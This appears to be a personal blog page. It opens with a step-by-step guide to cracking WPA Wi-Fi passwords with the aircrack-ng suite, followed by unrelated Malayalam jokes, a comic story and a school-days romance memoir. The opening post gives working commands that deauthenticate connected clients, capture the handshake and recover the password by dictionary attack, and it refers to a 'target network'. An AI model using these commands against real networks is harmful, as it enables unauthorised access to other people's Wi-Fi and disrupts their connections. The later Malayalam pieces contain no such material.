WPA cracking commands

Hi All

The below steps are for cracking a WPA security network for checking the password strength .
First u need backtrack 4 live cd,boot from it .Try step 1 to 7 in the same konsole ,step 8,9 in separate konsole.
First type airmon-ng in a new konsole .This show wifi card interface name. In my case it is wlan0 ,so i will type steps 1 as

1 airmon-ng stop wlan0

2 ifconfig wlan0 down

3 iwconfig wlan0 txpower 15 (this for increasing transmiting power,external wireless cards supports upto 25)

4 iwlist wlan0 txpower (this shows u the transmiting power)

5 airmon-ng start wlan0 (this for enable monotor mode ,my card's monitor mode is enabled mon0 ) so my next command as follows

6 airodump-ng mon0 (this step shows available network with channel and bssid .In my case channel is 11 and bssid 00:26:75:02:70:48,so i will type remaining commands as below, pls change command with your channel number and bssid

7 airodump-ng -c11 -w shanu --bssid 00:26:75:02:70:48 mon0 (this save the data as a file shanu in desktop)

8 aireplay-ng -0 5 -a 00:26:75:02:70:48 -c 00:C0:CA:2F:F3:4C mon0 (This for disconnecting connected client for getting WPA handshake .00:C0:CA:2F:F3:4C is the MAC address of client connected to the network ,change that with the client in your target network)

90aircrack-ng -w dictionary.lst -b 00:26:75:02:70:48 shanu-01.cap (this will give you the password)

ഒരു പ്രേത കഥ

എന്റെ പുതിയ സ്റ്റോറി ഒരു പ്രേത കഥ ഉടനെ പോസ്റ്റ്‌ ചെയ്യുന്നതാണ്‌...

ടിന്റു മോന്‍

ടിന്റു മോന്ഗണപതിയോട്

എന്നും രാവിലെ ടിന്റുമോന്ശിവനെ തൊഴാന്പോവും

ഒരു ദിവസം പൂജാരി ശിവനെ മാറ്റി ഗണപതിയെ വച്ചു

ടിന്റു മോന്ഗണപതിയോട് : "മോനേ അപ്പനോട് പറയണം അങ്കിള്വന്നിരുന്നു എന്ന്

കാര്‍ തള്ളല്‍

പെട്രോള്തീര്ന്നു........

കാര്‍ തള്ളിക്കൊണ്ട് വരുന്ന ടിന്റു മോനോട്

അച്ഛന്‍ : എന്താടാ നീ കരഞ്ഞോണ്ട് കാര്തള്ളി കൊണ്ടു വരുന്നതു

ടിന്റുമോന്‍ : അച്ഛനല്ലേ പറഞ്ഞതു ഒന്നും ചിരിച്ചു തള്ളി കളയരുതെന്നു

ടിന്റു മോന്അമ്പലത്തില്

അമ്പലത്തില്നിന്നും വന്ന ടിന്റുമോന്അച്ഛനോട്

അമ്മയുടെ പേരില്ഒരു പുഷ്പാഞ്ജലി കഴിച്ചു .

അച്ഛന്‍ : എന്റെ പേരിലോ ?

ടിന്റുമോന്‍: രാമേട്ടന്റെ കടയില്നിന്നും പൊറോട്ടയും ചിക്കനും കഴിച്ചു

ടൂത്ത് പേസ്റ്റ്

ടിന്റുമോന്‍: നിങ്ങളുടെ ടൂത്ത് പേസ്റ്റില്ഉപ്പുണ്ടോ

എങ്കില്കുറച്ച മുളകും പുളിയും തേങ്ങയും ചേര്ത്തു ചമ്മന്തി ഉണ്ടാക്കിക്കോ

പരീക്ഷ

പരീക്ഷക്ക്പേപ്പറില്ഒന്നും എഴുതാത്ത ടിന്റുമോന്ലാസ്റ്റ് പേജില്എഴുതി

ഒറ്റ തന്തക്കു പിറന്നവന്ആണേല്ജയിപ്പിക്കെടാ ..........

പ്രണയം

"നഷ്ടപ്പെടാം പക്ഷെ പ്രണയിക്കാതെ ഇരിക്കരുത് "

--കമല സുരയ്യ

"പ്രണയിക്കാം പക്ഷെ തലയിലാവരുത് "

-ടിന്റു മോന്‍ (എല്കെ ജി ലാസ്റ്റ് ബെഞ്ച്‌ )

ക്വട്ടേഷന്

ടീച്ചര്‍ :- ശ്രീ ക്രിഷ്ണനേ വധിക്കാന്കംസന്അസുരന്മാരെ നാലുപാടും അയച്ചു.....

ഇതില്നിന്നും എന്തു മനസിലാക്കാം....

ടിന്റുമോന്‍:- “ അന്നും ക്വട്ടേഷന്ടീം ഉണ്ടായിരുന്നു “.......

ടിന്റു മോന്റെ സിഗരെറ്റ്വലി

അച്ഛന്റെ മുന്പില്നിന്നു സിഗരെറ്റ്വലിക്കുകയായിരുന്ന ടിന്റു മോനോട് മാഷ്ചോദിച്ചു : അച്ഛന്റെ മുന്പില്നിന്നാണോടാ സിഗരെറ്റ്വലിക്കുന്നത് ?

ടിന്റുമോന്‍ : അച്ഛനല്ലേ ,പെട്രോള്പമ്പ്ഒന്നും അല്ലല്ലോ !!

ടിന്റു മോനും മാമനും

ഗള്ഫില്നിന്നും മാമന്‍ : നിനക്ക് എന്താ വേണ്ടത്

ടിന്റു മോന്‍ : മൊബൈല്മതി മാമാ

സ്നേഹത്തോടെ മാമന്‍ : NOKIA മതിയോടാ കുട്ടാ ?

ടിന്റു മോന്‍ : നോക്കിയാ പോരെടാ പട്ടി ........ അത് വാങ്ങണം .

ടിന്റു മോന്സ്നേഹിച്ച പെണ്ണ്

ടിന്റു മോന്‍ : ഒടുവില്സ്നേഹിച്ച പെണ്ണും എന്നെ ചതിച്ചു

ചുമ്മാ വിളിച്ചതാ കൂടെ ഇറങ്ങി പൊന്നു

ചന്ദ്രനില്വെള്ളമുണ്ടു

ഏഷ്യാനെറ്റ്‌ ഫ്ലാഷ് ന്യൂസ് " ചന്ദ്രനില്വെള്ളമുണ്ടു"

ടിന്റു മോന്‍ : " എനിക്ക് തോന്നുന്നത് വെള്ളമുണ്ടു നീല്ആമ്സ്ട്രോന്ഗ് ന്റെ ആണെന്ന്

പാവം ഉണക്കാന്ഇട്ടിട്ടു എടുക്കാന്മറന്നതാവും "

ടിന്റു മോന്റെ അപ്പൂപ്പന്‍

അപ്പൂപ്പന്‍ : " അയ്യോ മോനേ നിന്റെ മാഷ് വരുന്നുണ്ട് പോയി ഒളിച്ചോ "

ടിന്റുമോന്‍ : " ആദ്യം അപ്പൂപന്പോയി ഒളിച്ചോss

അപ്പൂപ്പന്‍ ചത്തെന്നു പറഞ്ഞാ ഞാന്കഴിഞ്ഞ രണ്ടാഴ്ച ലീവ് എടുത്തത്‌"


ബസ്സ് ഓട്ടം

ടിന്റു മോന്‍ ബസ്സ് ഓടിച്ചു കളിക്ക്യാണ്

"ദ്ര്ര്പി പി "

ശല്യം സഹിക്കതായപ്പോ അച്ഛന്‍ ബസ്സ് എടുത്തു വച്ചു .

ടിന്റു മോന്‍ വലിയ വായില്കരയാന്തുടങ്ങി ..കുറച്ചു കഴിഞ്ഞു അച്ഛന്അത് തിരിച്ചു കൊടുത്തു ..

ടിന്റു വീണ്ടും തുടങ്ങി

"ദ്ര്ര്പി പി സ്റ്റോപ്പ്‌ "

"വേഗം ഇറങ്ങ് ഒരു നായിന്റെ മോന്‍ കാരണം ഇപ്പോള്തന്നെ 5 മിനിറ്റ്ലേറ്റ് ആയി "


FTV

FTV കണ്ടു കൊണ്ടിരിക്കുന്നതിനിടെ കയറി വന്ന ടിന്റു മോനോട് അച്ഛന്

" പാവപെട്ട കുട്ടികള്ആണ് മോനേ വസ്ത്രം വാങ്ങാന്പോലും കാശില്ല "

ടിന്റു മോന്‍ : " ഇതിലും പാവപെട്ടവര്വന്നാല്വിളിക്കണേ അച്ഛാ "

Jose Painter


Guinnes ബുക്കില്‍ കയറിക്കൂടാന്‍ chance ഉണ്ടായിട്ടും അവിടെ എത്തിപ്പെടാതെ പോയ ഒരു സംഭവമാണു എന്റെ പുതിയ കഥ. ......

ഈ സംഭവ കഥ നടക്കുന്നത് ഞങ്ങളുടെ അയല്പക്കത്താണു . ഇതിലെ നായകന്‍ (അതോ വില്ലനോ ) ജോസ് അറിയപ്പെടുന്ന ഒരു പെയിന്റിംഗ് തൊഴിലാളി ആണു . അടുത്തുള്ള വീടുകള്‍ പയിന്ടടിച്ചു വൃത്തികേടാക്കുന്നത് ക്ഷമിക്കണം വൃത്തിയാക്കുന്നത് ജോസും പരിവാരങ്ങളുമാണു.സാമാന്യം സാമ്പത്തികം ഉള്ള വീട്ടിലെ അന്ഗമാണു ജോസ് . വീട്ടില്‍ വെറുതെ ഇരിക്കേണ്ട എന്ന് കരുതിയും പിന്നെ വീട്ടുകാരെ പട്ടിണിക്ക് ഇടേണ്ട എന്ന് കരുതിയും മാത്രമാണു ജോസ് പെയിന്റിംഗ് പണിക്കു പോകുന്നത്.

ആഴ്ചയില്‍ 3ദിവസം മാത്രമേ ജോസ് പണിക്കു പോകാറുള്ളൂ. ബാക്കി ദിവസം പണിക്കു പോയതിന്റെ ഹാന്ഗ് ഓവറില്‍ ആയിരിക്കുമത്രേ.. (പണി ഇല്ലാത്തതു കൊണ്ടാണെന്ന് നാട്ടുകാര്‍ )
കഴിഞ്ഞ X-masinu ജോസിനു ഞങ്ങളുടെ അയല്‍പക്കത്തെ അമേരിക്കന്‍ അച്ചായന്റെ 3 നില വീടിന്റെ പണി കിട്ടി. ഇതറിഞ്ഞ ജോസും പണിക്കാരും സന്തോഷത്തിലായി. കാരണം ഇനി കുറെ ദിവസം വീട്ടില്‍ പട്ടിണി ഇല്ലല്ലോ ......

Friends സിനിമയിലെ ലാസര്‍ ഇളയപ്പനെ പോലെ ജോസും പരിവാരങ്ങളും പറഞ്ഞ ദിവസം തന്നെ അച്ചായന്റെ പുതിയ വീട്ടിലെത്തി പണി തുടങ്ങി . X-masinu പാല് കാച്ചു നിശ്ചയിച്ചത് കൊണ്ട് plumbing പണികളും തകൃതിയായി നടക്കുന്നുണ്ട്. ജോസിനു പണിയാനല്ല മറിച്ച് പണിക്കാരെ കൊണ്ട് പണി ചെയ്യിക്കലാണു മിക്കപ്പോഴും പണി. (അത്ര നല്ലവരാണ് ജോസിന്റെ പണിക്കാര്‍ )....

ദിവസങ്ങള്‍ കടന്നു പോയി. ജോസ് ലാസര്‍ ഇളയപ്പനെ പോലെ വിറളി പിടിച്ചു പണിക്കാരെ ചീത്ത വിളിക്കാന്‍ തുടങ്ങി. പണി തീര്‍നില്ലേല്‍ തന്റെ പണി അമേരിക്കന്‍ അച്ചായന്‍ തീര്‍ക്കുമെന്ന് ജോസിനറിയാം...ഒരു ദിവസം വയ്കുന്നേരം അമേരിക്കന്‍ അച്ചായന്‍ പണി സ്ഥലത്തെത്തി .
അച്ചായന്‍: നാളെ കൊച്ചുമോളുടെ ബര്‍ത്ത്‌ ഡേ ആണു. എല്ലാരും ഉച്ചക്ക് ഉണ്ണാന്‍ വീട്ടില്‍ വന്നേക്കണം ...
ഇതുകേട്ട ജോസ് : അച്ചായാ ...നേരുത്തേ പറയേണ്ടാരുന്നോ ??
അച്ചായന്‍ : അതെന്താടാ??
ജോസ്: ഞാന്‍ 2 ദിവസം പട്ടിണി കിടന്നെച്ചു വന്നെനെല്ലോ ....
അതെ അത്രയ്ക്ക് ഭക്ഷണ പ്രിയനാണു നമ്മുടെ നായകന്‍ ജോസ്..

ബിരിയാനിയായിരുന്നു ബര്‍ത്ത്‌ ഡേ സ്പെഷ്യല്‍ . അന്ന് പണിക്കാര്‍ കുറവായതിനാല്‍ 3,4ബിരിയാണി അധികം വന്നു. ജോസിനു വിശപ്പില്ലത്തത് കൊണ്ട് 3എണ്ണം തിന്നു ജോസ് തീറ്റ മതിയാക്കി . ഉച്ചക്ക് ശേഷം മുകളിലത്തെ നിലയിലെ മാസ്റ്റര്‍ ബെട്രൂമിലയിരുന്നു ജോസ്. കുറച്ചു സമയത്തിന് ശേഷം ബിരിയാണി ജോസിന്റെ വയറ്റില്‍ കിടന്നു മുറ വിളി തുടങ്ങി. പെയിന്റ് കലക്കാന്‍ വച്ചിരുന്ന വെള്ളവും ബീഡിയും എടുത്തു master ബെട്രൂമിലെ toiletil പാഞ്ഞു കയറി ജോസ് അവനെ പുറത്തു ചാടിച്ചു. തിരിച്ചു വന്നു തന്റെ പെയിന്റിംഗ് കൂടുതല്‍ സന്തോഷത്തോടെ ചെയ്യാന്‍ തുടങ്ങി.

വലിയ ബഹളം കേട്ടാണു ജോസ് താഴത്തെ നിലയില്ലേക്ക് ചെന്നത്. വന്നപ്പോള്‍ കണ്ടതോ ??? തന്റെ പണിക്കാരെ മുഴുവന്‍ നിരത്തി നിര്‍ത്തി അച്ചായന്‍ ചോദ്യം ചെയ്യുന്നു
ഇതുകണ്ട ജോസ് : എന്താ ?? എന്താ അച്ചായ കാര്യം ??
അച്ചായന്‍ : ഏതാവനായാലും ഞാന്‍ വെറുതെ വിടില്ല..
ജോസ്: അച്ചായന്‍ ഇങ്ങനെ ചൂടാകാതെ കാര്യം പറ..
അച്ചായന്‍: നീ പുറകിലത്തെ ഗാര്ടനിലും അവിടുത്തെ ഭിത്തിയിലും പോയി നോക്കെടാ .....
ഇത് കേട്ട ജോസ് കാര്യമറിയാന്‍ പുറകിലേക്കോടി . അവിടെ കണ്ട കാഴ്ചയോ ??? "ജോസ് തന്റെ വയറ്റില്‍ നിന്നും പുറത്തു ചാടിച്ച ബിരിയാണി രണ്ടാമത്തെ നിലയുടെ ഭിത്തിയിലൂടെ താഴെ ഗാര്‍ദാനില്‍ എത്തിപ്പെട്ടിരിക്കുന്നു . അതിന്റെ പുറത്തു എരിഞ്ഞു തീര്‍ന്ന 1 കുറ്റി ബീഡിയും " നിങ്ങള്ക്ക് ഇതിന്റെ കാരണം മനസിലായോ??? ഇല്ലേല്‍ ഞാന്‍ തന്നെ പറയാം. ...
പ്ലുംബിങ്ങുക്കാര്‍ മാസ്റ്റര്‍ ബെട്രൂമിനുള്ളിലെ toilet fittings മാത്രം നടത്തി പോയതാണ് .അവര്‍ അതിന്റെ പൈപ്പ് septik ടാന്കിലേക്ക് ഇട്ടിരുന്നില്ല . ഇതറിയാതെ നമ്മുടെ ജോസ് അതില്‍ കേറി അപ്പി ഇട്ടേച്ചു പോയി...

അവസാനം നടന്നത് ... വയ്കുന്നേരം ജോസ് അത് കോരി septik ടാന്കിലാക്കി . ഇപ്പോഴും നിങ്ങളുടെ മനസ്സില്‍ സംശയം ബാക്കിയായിരിക്കും ,ഇതിലെവിടെ ginnus record നു സാധ്യത ??? അതും ഞാന്‍ തന്നെ പറയാം .... ജോസ് കയറിപ്പറ്റിയേനെ ,എങ്ങനെയെന്നോ ..."ലോകത്തിലാദ്യമായി toiletil അപ്പിയിട്ടിട്ടു അത് വെളിയില്‍ നിന്നും കോരി septik ടാങ്കില്‍ ഇട്ട ലോകത്തിലെ ആദ്യത്തെ വ്യക്തി എന്ന നിലയില്‍ "

എങ്ങനെയുണ്ട്......ഹി .....ഹി......ഹി ......

ഒരു പ്രണയ കാലത്തിന്‍റെ ഓര്‍മകളിലേക്ക് .......



Higher secondary പഠന കാലത്ത് എന്‍റെ മനസിലേക്ക് ഓടിയെത്തിയ ഒരു പ്രണയം .....
ഇതുവരെ അധികമാരും അറിഞ്ഞിട്ടില്ലാത്ത ......
ആരോടും പറഞ്ഞിട്ടില്ലാത്ത .......
നിശബ്ദമായ ഒരു പ്രണയം........അത് ഞാന്‍ ഇവിടെ പങ്കു വക്കുന്നു . അതിനു കാരണമോ. വര്‍ഷങ്ങള്‍ക്കു ശേഷമുള്ള ഒരു കണ്ടുമുട്ടലും,പിന്നെ കുറെ ഓര്‍മകളും..........

V.H.S.E അഡ്മിഷന്‍ ചെന്നപ്പോളാണ്‌ ഞാന്‍ അവളെ ആദ്യമായി കാണുന്നത്. തിളങ്ങുന്ന കണ്ണുകളുള്ള ...ചുവന്ന ചുരിദാറിട്ട ഒരു സുന്ദരി പെണ്‍കുട്ടി. അവളും അഡ്മിഷന്‍ വേണ്ടി വന്നതാണ്‌. അവളുടെ കണ്ണുകളിലെ തിളക്കം ആദ്യ കാഴ്ചയില്‍ തന്നെ എന്‍റെ കൗമാര മനസ്സില്‍ പ്രണയത്തിന്‍റെ നേര്‍ മൊട്ടുകള്‍ വാരി വിതറി.

ആരാണവള്‍ ?????അവളുടെ വീടെവിടെയാണ് ??? അവള്‍ ഏതു ബ്രാഞ്ചിലെക്കാന് ??? ഈ ചോദ്യങ്ങള്‍ എന്‍റെ മനസിലേക്ക് ഓടിയെത്തി. first ഗ്രൂപ്പില്‍ എനിക്ക് അഡ്മിഷന്‍ കിട്ടി . അപ്പോഴും അവളുടെ അഡ്മിഷന്‍ കഴിഞ്ഞിരുന്നില്ല .അതിനാല്‍ അവളുടെ ഗ്രൂപ്പ്‌ മനസിലാക്കാന്‍ സാധിച്ചില്ല . തിരികെ വരുമ്പോള്‍ തിളങ്ങുന്ന കണ്ണുകളുള്ള അവളുടെ 1 നേര്‍ത്ത ചിത്രം കൂടി ഞാന്‍ എന്‍റെ മനസ്സില്‍ വരച്ചു ചേര്‍്തിട്ടുണ്ടായിരുന്നു.

ഒന്നാം വര്‍ഷ ക്ലാസ്സിന്റെ ആദ്യ ദിവസം തന്നെ അവളെ കണ്ടെത്തണമെന്ന് എന്‍റെ മനസ് ആഗ്രഹിച്ചുതുടങ്ങി. ക്ലാസ്സ്‌ തുടങ്ങുവാന്‍ ഞാന്‍ കാത്തിരിക്കാന്‍ തുടങ്ങി... അവളെ വീണ്ടും കാണുവാന്‍ വേണ്ടി മാത്രം ആയിരുന്നു അത്.

ഇതിനിടയില്‍ ഞങ്ങളുടെ കടയുടെ അടുത്തുള്ള കടയുടമയായ അലി ഇക്കയുടെ ബന്ധുവായ പെണ്‍കുട്ടിയും second ഗ്രൂപ്പിന് അഡ്മിഷന്‍ എടുത്തിരുന്നു. എന്നെക്കുറിച്ച് ആ കുട്ടിയോട് പറഞ്ഞിട്ടുന്ടെന്നും ക്ലാസിനു ചെല്ലുമ്പോള്‍ പരിചയ പ്പെടനമെന്നും അലി ഇക്ക ‍ആവശ്യപ്പെട്ടു.

ആദ്യ ദിനം ....ആദ്യ പീരീഡ്‌ .....കുറെ പുതിയ മുഖങ്ങള്‍ ....
Ist ഗ്രൂപ്പും IInd ഗ്രൂപ്പും ഒന്നിച്ചായിരുന്നു ക്ലാസ്സ്‌. അപ്പോഴും എന്‍റെ മനസ്സില്‍ ആ ചുവന്ന ചുരിദാര്കാരിയുദെ നേര്‍ത്ത രൂപം മാത്രമായിരുന്നു . പരസ്പരം പരിചയപ്പെടുത്തലിന്റെ സമയമെത്തി. പലരും ക്ലാസിനു അഭിമുഖമായി നിന്ന് പരിചയപ്പെടുത്തല്‍ നടത്തി. ഇടയ്ക്കു എന്‍റെ അവസരം എത്തി. വിറയാര്‍ന്ന ശബ്ദത്തില്‍ ഞാന്‍ എന്നെ പുതിയ കൂട്ടുകാര്‍ക്കു പരിചയപ്പെടുത്തി. തിരികെ സീറ്റിലേക്ക് വരുമ്പോള്‍ എന്നെ സൂക്ഷിച്ചു നോക്കുന്ന 2 തിളങ്ങുന്ന കണ്ണുകള്‍ ഞാന്‍ കണ്ടു . ചുവന്ന ചുരിദാറിട്ട ....ആദ്യമായി എന്‍റെ മനസ്സില്‍ തളിര്‍ത്ത പ്രണയത്തിനു കാരണമായ ആ പെണ്‍കുട്ടി തന്നെ ആയിരുന്നു അത്.. എന്‍റെ മനസ്സില്‍ സന്തോഷം തിര തല്ലി. കാരണം അവളെ ഇനി എനിക്ക് ഇപ്പോഴും കാണാമല്ലോ....

പെണ്‍കുട്ടികളില്‍ 5- മതായി അവളുടെ ഊഴം എത്തി. അവള്‍ പേരും സ്ഥലവും പറഞ്ഞപ്പോള്‍ ഞാന്‍ സ്തബ്ദനായി ഇരുന്നു പോയി..അലി ഇക്കയുടെ ബന്ധുവായ പെണ്‍കുട്ടി തന്നെയാണ് എന്‍റെ മനസില്‍ കയറി കൂടിയ ഈ തിളങ്ങുന്ന കണ്ണുകാരി...എനിയ്ക്കു അത് വിശ്വസിക്കാന്‍ കുറെ സമയം വേണ്ടി വന്നു. എന്‍റെ മനസിലെ അവളുടെ നേര്‍ത്ത ചിത്രം കൂടുതല്‍ മിഴിവുറ്റതാകാന്‍ തുടങ്ങി.interval timil അവള്‍ എന്‍റെ അരികിലെത്തി. ....

അവള്‍: ഞാന്‍ അലിയുടെ അനുജന്റെ മകളാണ്
ഞാന്‍: അലി ഇക്ക പേര് പറഞ്ഞു തന്നിരുന്നു .
അവള്‍: എന്‍റെ പേര് സുറുമി. ഞാന്‍ MLT (second group) ആണു
ഞാന്‍: എന്‍റെ പേര് ഷാനവാസ്‌ ,ഞാന്‍ MRRTV (first group) ആണു
പരിചയപ്പെടല്‍ പെട്ടന്ന് തന്നെ കഴിഞ്ഞു ഞങ്ങള്‍ അടുത്തടുത്തുള്ള ക്ലാസ്സുകളിലേക്ക് പോയി.

physics,chemistry,General foundation course എന്നിവ combined ക്ലാസ്സുകളാണ്. അപ്പോള്‍ ഞങ്ങള്‍ അവരുടെ ക്ലാസ്സിലെത്തും . അങ്ങനെ combined ക്ലാസിനു വേണ്ടി ഞാന്‍ കാത്തിരിക്കാന്‍ തുടങ്ങി.
ദിവസങ്ങള്‍ കടന്നു പോയി. എല്ലാവരുമായും ഞാന്‍ ചങ്ങാത്തത്തിലായി. ക്ലാസ്സിലെ മറ്റുള്ളവരേക്കാള്‍ കൂടുതല്‍ അവള്‍ എന്നോട് അടുപ്പം കാണിച്ചു തുടങ്ങി. ഇത് പ്രണയമായി എന്‍റെ കൂട്ടുകാര്‍ വ്യാഖ്യാനിച്ചു. അവള്‍ എന്നോട് സംസാരിക്കുന്നത് പ്രണയം കൊണ്ടല്ല മറിച്ച് അലി ഇക്കയും ആയുള്ള എന്‍റെ പരിചയം കാരണമാണെന്ന് എനിക്ക് നന്നായി അറിയാമായിരുന്നു. അതുകൊണ്ടുതന്നെ എന്‍റെ പ്രണയം ഞാന്‍അവളില്‍ നിന്നും മറച്ചു വച്ചു.
ഞാനവളെ നിശബ്ദമായി പ്രണയിക്കാന്‍ തുടങ്ങി.
ഒരു ശനിയാഴ്ച ഞാനവളെ ഫോണില്‍ വിളിച്ചു .സംഭാഷണത്തിനിടയില്‍ എനിക്കാരോടോ ഇഷ്ടമുനടെന്നും അത് അറിഞ്ഞുവെന്നും അവള്‍ പറഞ്ഞു. ആ പെണ്‍കുട്ടി ആരെന്നറിയാന്‍ അവള്‍ പലവട്ടം എന്നോട് ചോദ്യം ആവര്‍ത്തിച്ചു

സുറുമി: നിനക്ക് നമ്മുടെ ക്ലാസ്സിലെ ആരെയെങ്കിലും ഇഷ്ടമാണോ?
ഞാന്‍: എനിക്കങ്ങനെ ഒന്നുമില്ല...
സുറുമി: പക്ഷെ ഞാനറിഞ്ഞല്ലോ ......ഏതു കുട്ടിയാണവള്‍???
ഞാന്‍: നിനക്ക് വെറുതെ തോന്നുന്നതാണ്
സുറുമി: അല്ല ... നിന്റെ ക്ലാസ്സില്‍ വരുമ്പോഴുള്ള പെരുമാറ്റം കണ്ടാലറിയാം അങ്ങനെ എന്തോ ഉണ്ടെന്നു.
നിത്യ ,ധന്യ, പ്രിയ, രജനി...... അവളൊഴികെ എല്ലാവരുടെയും പേര് അവള്‍ പറഞ്ഞു..അപ്പോഴെല്ലാം അല്ല ,അല്ല എന്നായിരുന്നു എന്‍റെ മറുപടി.
ആവസാനം അവള്‍: പിന്നെയാരാ ....ഇനി ഞാനാണോ???
ഇത്തവണ മൗനം ആയിരുന്നു എന്‍റെ മറുപടി. ആ മൗനം എന്‍റെ പ്രണയം അവളോട്‌ പറഞ്ഞു കഴിഞ്ഞിരുന്നു. എന്നെ നിനക്ക് ഇഷ്ടമാണോ എന്ന എന്‍റെ ചോദ്യത്തിന് മറുപടി നല്‍കാതെ അവള്‍ ഫോണ്‍ വച്ചു.എന്‍റെ മൂത്ത സിസ്റ്റര്‍ അവിടെ senior ആയി പഠിക്കുന്നുണ്ടായിരുന്നു. അവര്‍ തമ്മില്‍ നല്ല കൂട്ടുകാരുമാണ് .ഇനി അവര്‍ തമ്മില്‍ ഇത് പറയുമോ എന്നതും എന്നെ അലസോരപ്പെടുത്തി. .തിങ്കളാഴ്ച അവളെ കാണുവാന്‍ എനിക്ക് മടിയായിരുന്നു.. എന്നാല്‍ സാധാരണ പോലെ അവള്‍ എന്നോട് പെരുമാറി.പിന്നീട് അവളോട്‌ എന്‍റെ സ്നേഹത്തെക്കുറിച്ച് ഞാന്‍ ചോദിച്ചതെയില്ല.


1 വര്‍ഷം പെട്ടന്ന് കടന്നു പോയി. 2-)oവര്‍ഷ ക്ലാസുകള്‍ തുടങ്ങി. ഇത്തവണ എങ്കിലും അവളോട്‌ മറുപടി ചോദിക്കണമെന്ന് ഞാന്‍ മനസിലുറപ്പിച്ചു. എന്നാല്‍ എന്‍റെ ഇളയ സഹോദരി ജൂനിയര്‍ ആയി വന്നത് അതിനു വിലങ്ങു തടിയായി. കുറഞ്ഞ സമയം കൊണ്ട് തന്നെ അവരും നല്ല കൂട്ടുകാരികളായി മാറി...

combined ക്ലാസ്സ്കളിലെ എന്റെ നോട്ടം അവള്‍ ശ്രദ്ധിക്കുന്നുണ്ടായിരുന്നു . പലപ്പോഴും ഞാന്‍ നോക്കുമ്പോള്‍ അവളും നോക്കുമായിരുന്നു. ചിലപ്പോള്‍ അധ്യാപകര്‍ എന്നെ വഴക്ക് പറയുമ്പോള്‍ അവളുടെ മുഖം വാടുന്നത് ഞാന്‍ കണ്ടിരുന്നു. . മറ്റു പെണ്‍കുട്ടികളുമായി ഞാന്‍ കാര്യം പറയുമ്പോള്‍ അവള്‍ എന്നെ ദേഷ്യപ്പെട്ടു നോക്കുന്നത് ഞാന്‍ കണ്ടിരുന്നു.....

സ്കൂള്‍ ബസിലെ യാത്രകളില്‍ സൈഡ് സീടിലായിരിക്കും എന്റെ സ്ഥാനം. അവള്‍ ഇറങ്ങുന്ന സ്റ്റോപ്പ്‌ എത്തുമ്പോള്‍ ഞാന്‍ നോക്കുമായിരുന്നു. ഒരു ചെറു പുഞ്ചിരിയോടെ അവള്‍ എന്നെ നോക്കുന്നത് ഞാന്‍ കാണുമായിരുന്നു. ക്ലാസ്സില്‍ ഷാന്‍ എന്ന് അവള്‍ മാത്രമേ എന്നെ വിളിക്കുമായിരുന്നുള്ളൂ. ഷാന്‍ എന്ന വിളി അവളുടെ സ്നേഹം കാരണമാണോ? എന്നിട്ടും എന്തെ അവള്‍ എന്റെ പ്രണയത്തിനു മറുപടി നല്‍കിയില്ലാ.. ??? . ഇനി എന്റെ നിശബ്ദ പ്രണയം അവളിലെക്കും പടര്‍ന്നതാണോ?? എനിക്ക് ഉറപായിരുന്നു അവള്‍ക്കും എന്നോട് ഇഷ്ടമുന്ടെന്നു........


എന്‍റെ പ്രണയം നിശബ്ദമായി ആ വര്‍ഷവും തുടര്‍ന്നു .ക്ലാസ്സ്‌ തീരുവാന്‍ ദിവസങ്ങള്‍ മാത്രം ബാക്കിയായി.
ഒരു ദിവസം ഉച്ചക്ക് അവള്‍ എന്‍റെ അരുകിലെത്തി
സുറുമി: ഷാന്‍.. ഈ autographil എന്തെങ്കിലും എഴുതണം
ഞാന്‍: എന്തിനാ....???
സുറുമി: വെറുതെ ഓര്‍ത്തിരിക്കാന്‍ വേണ്ടി ..
ഞാന്‍: ശരി, പക്ഷെ 2 ദിവസം എനിക്ക് സമയം തരണം
അവള്‍ ചിരിച്ചുകൊണ്ട് സമ്മതം മൂളി.എന്‍റെ പ്രണയം ഒന്നുകൂടി ആ autographലൂടെ പറയാന്‍ വേണ്ടിയാണ് ഞാന്‍ 2 ദിവസം ആവശ്യപ്പെട്ടത് .
ഒരു റോസാപ്പൂവും 2തുള്ളി കണ്ണുനീരും ഞാന്‍ ആ autographil വരച്ചു ചേര്‍ത്തു . അതിനടിയിലായി ഞാന്‍ ഇപ്രകാരം എഴുതി
"ഒരു വാക്കോ, ഒരു വരയോ മതിയാവില്ല കലാലയ നൊമ്പരങ്ങള്‍ വര്‍ണിക്കാന്‍ ..
മറക്കരുത്...സ്നേഹത്തോടെ സ്വന്തം ഷാന്‍.. "


പഠനത്തിനു ശേഷം 6 വര്‍ഷങ്ങള്‍ ജീവിതത്തിലൂടെ കടന്നു പോയി. കഴിഞ്ഞ മാസം അടൂരില്‍ ഒരു jewelleryil വച്ചു ഞാന്‍ അവളെ അവിചാരിതമായി കണ്ടുമുട്ടി. അവളുടെ അനുജത്തിയും ഒപ്പം ഉണ്ടായിരുന്നു.പെട്ടന്നുള്ള കണ്ടുമുട്ടലായത് കൊണ്ട് എനിക്ക് ഒന്നും ചോദിയ്ക്കാന്‍ കഴിഞ്ഞില്ല . മൊബൈല്‍ നമ്പര്‍ വാങ്ങണമെന്നു തോന്നി. ഇനി അവള്‍ക്ക് അതൊരു ശല്യമായി തോന്നിയാലോ? തരില്ല എന്ന് പറഞ്ഞാലോ?.ഇത്തരം ചിന്തകള്‍ എന്നെ അതില്‍ നിന്നും പിന്തിരിപ്പിച്ചു. എന്തോ അവള്‍ക്കുഎന്നോട് പറയാനുണ്ട്‌ എന്ന് എനിക്ക് തോന്നി.വെറുതെ തോന്നിയതാകാം എന്ന് കരുതി‍ bye പറഞ്ഞു ഞാന്‍ jewellery യുടെ പടികളിറങ്ങി തുടങ്ങി , പെട്ടന്നുപുറകില്‍ നിന്നൊരു വിളികേട്ടു ഞാന്‍ നിന്നു . അത് അവളായിരുന്നു.....

ഞാന്‍: എന്താ.....??
സുറുമി: മൊബൈല്‍ നമ്പര്‍ തരുമോ? ഞാന്‍ വീട്ടിലെത്തിയിട്ട്‌ വിളിക്കാം. അനുജത്തി നിന്നതുകൊണ്ട അപ്പോള്‍ ചോദിക്കാഞ്ഞത് ..
ഞാന്‍: ഓക്കേ, 098476xxxxx
എന്നിട്ടും ഞാന്‍ അവളുടെ നമ്പര്‍ വാങ്ങിയില്ല. വൈകിട്ട് തന്നെ അവളുടെ ഫോണ്‍ കാള്‍ എന്‍റെ മോബൈലിലെക്കെത്തി .
അവള്‍: ഷാനവാസ്‌ ആണോ?
ഞാന്‍ : അതെ ആരാ..???
അവള്‍: ഞാനാ .........സുറുമി.
